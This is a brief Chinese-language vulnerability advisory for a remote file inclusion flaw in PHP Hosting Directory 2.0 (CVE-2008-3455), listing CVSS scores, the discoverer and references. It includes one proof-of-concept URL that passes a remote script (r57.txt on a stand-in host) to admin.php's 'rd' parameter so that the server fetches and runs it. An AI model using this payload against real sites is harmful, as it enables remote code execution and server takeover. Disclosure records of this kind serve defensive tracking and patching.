关键漏洞信息摘要 漏洞概述 漏洞名称: PHP Hosting Directory 2.0 (admin.php rd) RFI Vulnerability 风险等级: High 技术细节 CVSS Base Score: 10/10 影响子评分: 10/10 利用子评分: 10/10 漏洞特性 本地攻击: No 远程攻击: Yes CVE编号: CVE-2008-3455, CWE-94 CWE编号: CWE-94 漏洞描述 脚本名称: PHP Hosting Directory 2.0 下载链接: http://jnshosts.com/download/phphost_directory.zip 发现者: RoMaNcYxHaCkEr 漏洞类型: RFI (Remote File Inclusion) 证明攻击链接: http://Www.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt? 参考资料 SecurityFocus Milw0rm